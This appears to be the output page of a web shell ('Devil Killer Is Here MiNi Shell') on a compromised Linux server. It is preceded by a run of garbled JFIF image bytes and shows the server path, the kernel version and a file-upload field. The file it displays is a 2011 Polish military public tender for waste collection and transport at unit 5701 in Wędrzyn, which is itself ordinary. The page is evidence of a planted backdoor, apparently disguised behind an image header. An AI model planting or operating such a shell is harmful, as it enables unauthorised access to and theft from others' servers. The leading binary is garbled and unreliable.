JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111209/325813-N-2011.html

<p class="kh_header"><b>Wędrzyn: ŚWIADCZENIE USŁUG POLEGAJACYCH NA: ODBIORZE I TRANSPORCIE DO MIEJSCA DALSZEGO ZAGOSPODAROWANIA BĄDŹ  UTYLIZACJI ODPADÓW Z MIEJSCA ICH WYTWARZANIA Z TERENÓW ADMINISTROWANYCH PRZEZ JEDNOSTKĘ WOJSKOWĄ NR 5701 W M. WĘDRZYN, MIĘDZYRZECZ I SKWIERZYNA</b><br>
<b>Numer ogłoszenia: 325813 - 2011; data zamieszczenia: 09.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 5701 Wędrzyn , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG POLEGAJACYCH NA: ODBIORZE I TRANSPORCIE DO MIEJSCA DALSZEGO ZAGOSPODAROWANIA BĄDŹ  UTYLIZACJI ODPADÓW Z MIEJSCA ICH WYTWARZANIA Z TERENÓW ADMINISTROWANYCH PRZEZ JEDNOSTKĘ WOJSKOWĄ NR 5701 W M. WĘDRZYN, MIĘDZYRZECZ I SKWIERZYNA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na: odbiorze i transporcie do miejsca dalszego zagospodarowania odpadów z miejsc ich wytwarzania na terenach administrowanych przez Jednostkę Wojskową 5701 Wędrzyn (45 WOG). Miejsca odbioru odpadów, szacunkowe przewidziane do przekazania ich ilości oraz ilość zbiorników do gromadzenia odpadów zostały zamieszczone w szczegółowym opisie przedmiotu zamówienia stanowiącym zał. nr 1 do SIWZ.  Przedmiot zamówienia podzielony jest na 3 zadania:
Zadanie 1. 
Odbiór i transport do miejsca dalszego zagospodarowania odpadów kuchennych ulegających biodegradacji o kodzie 20 01 08 nadanym zgodnie z rozporządzeniem Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz. U. 2001, nr 112, poz. 1206) powstające przy przygotowywaniu i konsumpcji posiłków zwanych dalej odpadami gastronomicznymi w ilości ok. 91,9 Mg przy czym:
- odpad stanowiący produkty pochodzenia zwierzęcego w ilości ok. 55,14 Mg; 
- odpad stanowiący produkty pochodzenia roślinnego w ilości ok. 36,76 Mg 
1) W ramach usługi Wykonawca dokonywać będzie transportu odpadów gastronomicznych do miejsca ich dalszego zagospodarowania własnym, przystosowanym do tego celu środkiem transportu.
2) Wykonawca będzie dokonywał odbioru i transportu odpadów z miejsc ich wytwarzania wymienionych w tabeli 1. dwa razy w tygodniu tj.: we wtorek i w piątek z tym, że w dni wolne od pracy tj. 25.12.2012 r. odbiór ma nastąpić 27.12.2012 r. 
3) Wykonawca zapewni odpowiednie pojemniki do gromadzenia odpadów o pojemności  50-80 litrów w ilości pozwalającej na ich właściwe przechowywanie uwzględniając podział na odpady pochodzenia roślinnego i zwierzęcego - wymienione w tabeli 1. Pojemniki będą odpowiednio opisane (zawierające kod odpadu), szczelne, posiadające uchwyty oraz zamknięcia umożliwiające układanie ich piętrowo. Pojazdy i pojemniki wielokrotnego użytku, a także wszystkie pozostałe elementy wyposażenia lub sprzęt wielokrotnego użytku muszą zostać wyczyszczone, wymyte i zdezynfekowane po każdym użyciu, muszą być utrzymywane w czystości tj. być czyste i suche przed użyciem oraz muszą zostać przeznaczone do przewozu określonego produktu w zakresie niezbędnym do uniknięcia zakażeń wzajemnych.
4) Dokładna ilość odbieranych odpadów gastronomicznych zostanie każdorazowo ustalana w trakcie ich odbioru w wyniku ważenia, co potwierdzone zostanie w dokumencie PZ stanowiący załącznik do umowy oraz w dokumencie handlowym o ile jest konieczność przestrzegania rozporządzenia (WE)  NR 1774/2002 Parlamentu Europejskiego i Rady z dnia 3 października 2002 r. ustanawiające  przepisy   sanitarne  dotyczące   produktów  ubocznych    pochodzenia    zwierzęcego nieprzeznaczonych do spożycia  przez  ludzi (Dz. U. L 273 z 10.10.2002, str. 1, z późniejszymi zmianami) uwzględniając jego rozdział I, artykuł 1, pkt. 2c. Zestawienie miesięczne przekazanych odpadów ujęte zostanie w karcie przekazania odpadu oraz protokole odbioru usługi.
5) Z chwilą odbioru odpadów gastronomicznych Wykonawca usługi staje się ich posiadaczem i na nim ciąży obowiązek dalszego gospodarowania nimi, zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. 2010r, nr 185, poz. 1243 z późniejszymi zmianami), aktami wykonawczymi w tym zakresie oraz w zależności od sposobu ich dalszego zagospodarowania jeżeli zachodzi taka potrzeba rozporządzenia (WE)  NR 1774/2002 Parlamentu Europejskiego i Rady z dnia 3 października 2002 r. ustanawiające  przepisy   sanitarne  dotyczące   produktów  ubocznych    pochodzenia    zwierzęcego nieprzeznaczonych do spożycia  przez  ludzi (Dz. U. L 273 z 10.10.2002, str. 1, z późniejszymi zmianami).
6) Podane ilości przedmiotu zamówienia są ilościami szacunkowymi (planowanymi) i mogą na etapie realizacji zamówienia ulec zmniejszeniu bądź zwiększeniu. 
Zadanie 2.
Odbiór i transport do miejsca unieszkodliwienia odpadów o kodzie 18 01 03 - Inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przeniesienia materiału genetycznego, o których wiadomo lub co do których istnieją wiarygodne podstawy do sądzenia, że wywołują choroby u ludzi i zwierząt (np. zainfekowane pieluchomajtki, podpaski, podkłady) z wyłączeniem 18 01 80, 18 01 82 nadanym zgodnie z rozporządzeniem Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz. U. 2001, nr 112, poz. 1206) zwanych dalej odpadami medycznymi w ilości ok. 1 Mg.
1) Odbiór odpadów następować będzie z miejsca ich wytwarzania określonych w tabeli 2 dwa razy w tygodniu (wtorek i piątek) lub dodatkowo według potrzeb Zamawiającego na jego telefoniczne lub pisemne zgłoszenie.
2) W ramach usługi Wykonawca dokonywać będzie transportu odpadów do miejsca ich unieszkodliwienia własnym, przystosowanym do tego celu środkiem transportu.
3) Dokładna ilość odbieranych odpadów medycznych zostanie każdorazowo ustalana w trakcie ich odbioru w wyniku ważenia, co potwierdzone zostanie w karcie przekazania odpadu.
4) Podane ilości przedmiotu zamówienia są ilościami szacunkowymi (planowanymi) i mogą na etapie realizacji zamówienia ulec zmniejszeniu bądź zwiększeniu.
5) Z chwilą odbioru odpadów medycznych Wykonawca usługi staje się ich posiadaczem
i na nim ciąży obowiązek dalszego gospodarowania nimi, zgodnie z ustawą z dnia
27 kwietnia 2001 r. o odpadach  (Dz. U. 2010r, nr 185, poz. 1243 z późniejszymi zmianami) oraz aktami wykonawczymi w tym zakresie.
Zadanie 3.
Odbiór i transport do miejsca dalszego zagospodarowania odpadów powstałych w wyniku prowadzonych prac remontowo -obsługowych przy sprzęcie technicznym.
1) Wykonawca odbioru odpadów dokonywać będzie z miejsca ich wytwarzania w ilościach określonych w tabeli 3 do miejsca ich dalszego zagospodarowania własnym, przystosowanym do tego celu środkiem transportu według potrzeb Zamawiającego na jego telefoniczne lub pisemne zgłoszenie.
2) Podane ilości przedmiotu zamówienia są ilościami szacunkowymi (planowanymi) i mogą na etapie realizacji zamówienia ulec zmniejszeniu bądź zwiększeniu.
3) Dokładna ilość odbieranych odpadów powstałych w wyniku prowadzonych prac remontowo -obsługowych przy sprzęcie technicznym zostanie każdorazowo ustalana w trakcie ich odbioru w wyniku ważenia, co potwierdzone zostanie w karcie przekazania odpadu.
4) Z chwilą odbioru odpadów powstałych w wyniku prowadzonych prac remontowo -obsługowych przy uzbrojeniu i sprzęcie technicznym Wykonawca usługi staje się ich posiadaczem i na nim ciąży obowiązek dalszego gospodarowania nimi, zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach  (Dz. U. 2010r, nr 185, poz. 1243 z późniejszymi zmianami) oraz aktami wykonawczymi w tym zakresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 ustawy P.z.p.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu o udzielenie zamówienia publicznego nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiedza i doświadczenie. Opis sposobu dokonywania oceny spełniania tego warunku: wykażą i udokumentują (referencjami, opiniami lub listami polecającymi, protokołami odbioru końcowego), iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonali usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć wykonanie co najmniej dwóch usług dotyczących odbioru , transportu odpadów do miejsca ich dalszego zagospodarowania i utylizacji o wartości każdego zadania nie mniejszej niż :
dla zadania nr 1: należy wykazać wykonanie co najmniej 2 (dwa) różne zamówienia o minimalnej wartości  10 000,00 PLN,
dla zadania nr 2: należy wykazać wykonanie co najmniej 2 (dwa) różne zamówienia o minimalnej wartości 10 000,00 PLN,
dla zadania nr 3: należy wykazać wykonanie co najmniej 2 (dwa) różne zamówienia o minimalnej wartości 10 000,00 PLN.
         
Jeżeli wykonawca zamierza składać ofertę na wszystkie (trzy)  zadania, powinien  udokumentować że wykonał co najmniej dwie usługi w zakresie utrzymania odbioru , transportu odpadów do miejsca ich dalszego zagospodarowania i utylizacji  o  wartości minimum 30.000 zł.

Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu wykonanych usług o podobnym charakterze i  dokumentów potwierdzających, że usługi te zostały prawidłowo ukończone; na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów: 
1) złożą ważną na dzień składania ofert, polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnie z przedmiotem zamówienia w zakresie odpowiedzialności cywilnej kontraktowej i deliktowej z kwotą gwarantowaną nie mniejszą niż :
dla zadania nr 1: co najmniej 10 000,00 PLN
dla zadania nr 2: co najmniej 10 000,00 PLN
dla zadania nr 3: co najmniej 10 000,00 PLN

W przypadku gdy wykonawca ubiegać będzie się o więcej niż jedno zadanie zobowiązany jest do przedstawienia polisy ubezpieczeniowej na sumę gwarantowaną stanowiącą minimum równowartość poszczególnych zadań (przykład: jeżeli wykonawca ubiega się o wykonanie zadania nr 1 i nr 2 to przedstawia polisę na sumę gwarantowaną   min. 20 000,00 PLN).

Wykonawca zobowiązuje się, że będzie utrzymywał powyższy zakres ubezpieczenia do końca trwania umowy.
Ocena spełniania warunku będzie dokonana na podstawie złożonego dokumentu na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) złożą oświadczenie o posiadaniu specjalistycznej wiedzy oraz sprzętu i środków sprzętu do odbioru i transportu do miejsca dalszego zagospodarowania odpadów z miejsc ich wytwarzania wg wzoru zawartego w - załączniku nr 6;
2) zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. 2010, nr 185, poz. 1243, późniejszymi zmianami) aktualną decyzję w zakresie zbierania, transportu oraz dalszego gospodarowania odpadami (unieszkodliwianie lub odzysk), a w razie jej braku umowę współpracy z innym podmiotem posiadającym  pozwolenie na gospodarowanie  nimi,
3) przy realizacji zadania nr 1 zgodnie z rozporządzeniem (WE)  NR 1774/2002 Parlamentu Europejskiego i Rady z dnia 3 października 2002 r. ustanawiające  przepisy   sanitarne  dotyczące   produktów  ubocznych    pochodzenia    zwierzęcego nieprzeznaczonych do spożycia  przez  ludzi (Dz. U. L 273 z 10.10.2002, str. 1, z późniejszymi zmianami) o ile jest ono wymagane uwzględniając rozdział I, artykuł 1, pkt. 2c niniejszego rozporządzenia decyzję powiatowego lekarza weterynarii w zakresie zbierania i transportu ubocznych produktów pochodzenia zwierzęcego kategorii 3,
4) przy realizacji zadania nr 1 oświadczenie o sposobie postępowania z przyjętymi odpadami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 5701 Wędrzyn
69-211 Wędrzyn
bud. nr 33 pok. 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2011 godzina 10:30, miejsce: Jednostka Wojskowa 5701 Wędrzyn
69-211 Wędrzyn
bud. nr 33 pok. 211 Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ŚWIADCZENIE USŁUG POLEGAJACYCH NA: ODBIORZE I TRANSPORCIE DO MIEJSCA DALSZEGO ZAGOSPODAROWANIA BĄDŹ  UTYLIZACJI ODPADÓW Z MIEJSCA ICH WYTWARZANIA Z TERENÓW ADMINISTROWANYCH PRZEZ JEDNOSTKĘ WOJSKOWĄ NR 5701 W M. WĘDRZYN, MIĘDZYRZECZ I SKWIERZYNA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1. 
Odbiór i transport do miejsca dalszego zagospodarowania odpadów kuchennych ulegających biodegradacji o kodzie 20 01 08 nadanym zgodnie z rozporządzeniem Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz. U. 2001, nr 112, poz. 1206) powstające przy przygotowywaniu i konsumpcji posiłków zwanych dalej odpadami gastronomicznymi w ilości ok. 91,9 Mg przy czym:
- odpad stanowiący produkty pochodzenia zwierzęcego w ilości ok. 55,14 Mg; 
- odpad stanowiący produkty pochodzenia roślinnego w ilości ok. 36,76 Mg 
1)	W ramach usługi Wykonawca dokonywać będzie transportu odpadów gastronomicznych do miejsca ich dalszego zagospodarowania własnym, przystosowanym do tego celu środkiem transportu.
2)	Wykonawca będzie dokonywał odbioru i transportu odpadów z miejsc ich wytwarzania wymienionych w tabeli 1. dwa razy w tygodniu tj.: we wtorek i w piątek z tym, że w dni wolne od pracy tj. 25.12.2012 r. odbiór ma nastąpić 27.12.2012 r. 
3)	Wykonawca zapewni odpowiednie pojemniki do gromadzenia odpadów o pojemności  50-80 litrów w ilości pozwalającej na ich właściwe przechowywanie uwzględniając podział na odpady pochodzenia roślinnego i zwierzęcego - wymienione w tabeli 1. Pojemniki będą odpowiednio opisane (zawierające kod odpadu), szczelne, posiadające uchwyty oraz zamknięcia umożliwiające układanie ich piętrowo. Pojazdy i pojemniki wielokrotnego użytku, a także wszystkie pozostałe elementy wyposażenia lub sprzęt wielokrotnego użytku muszą zostać wyczyszczone, wymyte i zdezynfekowane po każdym użyciu, muszą być utrzymywane w czystości tj. być czyste i suche przed użyciem oraz muszą zostać przeznaczone do przewozu określonego produktu w zakresie niezbędnym do uniknięcia zakażeń wzajemnych.
